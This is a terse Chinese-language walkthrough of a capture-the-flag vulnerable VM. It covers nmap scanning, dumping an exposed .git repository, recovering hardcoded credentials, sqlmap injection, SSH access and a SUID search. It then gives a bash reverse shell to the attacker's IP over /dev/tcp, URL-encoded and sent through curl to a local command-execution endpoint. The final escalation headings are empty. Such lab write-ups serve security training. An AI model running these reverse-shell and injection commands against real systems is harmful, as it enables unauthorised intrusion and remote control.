描述
Difficulty:Hard
This works better with VMware rather than VirtualBox
Hint: Don’t waste your time For Brute-Force
nmap扫存活
1 2
| kali 192.168.169.220 靶机 192.168.169.230
|
nmap扫描靶机
1 2
| 端口 22 80 Git repository git泄露
|
目录
使用git工具
1
| https://github.com/arthaud/git-dumper
|
1
| python3 git_dumper.py http://192.168.169.230/.git/ website
|
查看文件
git log
1
| if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){
|
登陆测试
注入
1
| sqlmap -u "http://192.168.169.230/dashboard.php?id=1" --cookie PHPSESSID=3ca3jbi4mk3749bv84uu4supol --dbs
|
ssh
1
| ssh jehad@192.168.169.230
|
1
| find / -user root -perm -4000 -print 2>/dev/null
|
写入shell
1
| bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'
|
1
| bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'
|
1
| curl "127.0.0.1:9999/?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'"
|
切换用户
提权